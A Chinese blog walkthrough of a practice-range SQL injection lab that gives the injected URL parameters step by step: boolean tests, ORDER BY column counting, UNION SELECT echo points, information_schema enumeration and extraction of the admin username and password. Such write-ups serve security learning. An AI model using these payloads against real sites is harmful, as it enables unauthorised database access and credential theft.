sql注入

文章目录

- 一、封神台一

一、封神台一

1、判断是否存在sql注入漏洞

1、构造?id=1 and 1=1
在这里插入图片描述
发现页面正常显示

2、构造?id=1 and 1=2
在这里插入图片描述
发现页面显示错误

2、判断字段数

1.构造?id=1 and 1=1 order by 1
在这里插入图片描述
页面正常显示

2.构造?id=1 and 1=1 order by 2
页面正常显示

3.构造?id=1 and 1=1 order by 3
页面显示错误
由此可以判断出字段数为2

3、判断回显点

1.构造?id=1 and 1=2 union select 1,2
在这里插入图片描述
发现的第二个字段处为显示位（可以理解为从数据库提取的数据被显示在前端）
可以在第二个字段处显示我们想要的内容

database()    数据库名
user()    数据库用户名
version()  显示mysql版本
@@datadir    数据库路径
@@version_compile_os     操作系统版本
1
2
3
4
5

2.构造?id=1 and 1=2 union select 1,database()
在这里插入图片描述
3.构造?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

information_schema 用于存储数据库元数据(关于数据的数据)，例如数据库名、表名、列的数据类型、访问权限等。
information_schema.tables 存储数据库中的表信息（包括视图），包括表属于哪个数据库，表的类型、存储引擎、创建时间等信息
information_schema.columns 存储表中的列信息，包括表有多少列、每个列的类型等

在这里插入图片描述
查询到当前表名
4.构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='maoshe' and table_name='admin' limit 0,1

table_schema 是数据库的名称
table_name 是具体的表名
table_type 表的类型
column_name 是表中列名

在这里插入图片描述
5.构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='maoshe' and table_name='admin' limit 1,1

6.构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='maoshe' and table_name='admin' limit 2,1
在这里插入图片描述
经过对表中字段的查询发现，该admin表有三个字段，id、username、password
7.构造?id=1 and 1=2 union select 1,username from admin limit 0,1

发现有一个admin用户，在通过limit 1,1查询第二用户为空，则只有一个用户
7.构造?id=1 and 1=2 union select 1,password from admin
在这里插入图片描述
查询到密码

相关阅读:
CSS的初步学习
HBuilder X配置代码块快速创建代码 VSCode配置代码块保姆级教程
Notepad++插件 Hex-Edit
Mybatis Plus一对多联表查询及分页解决方案
15 | 流
nuScenes数据集浅探（待完善……）
Cache系列直播，这次真的来了！
这款IDE插件3.0让你成为公司最懂安全的程序员
零售业：别让数据安全成为业务的绊脚石!（附文件下载）
【iOS】push与present Controller的区别

原文地址：https://blog.csdn.net/qq_52108058/article/details/127660904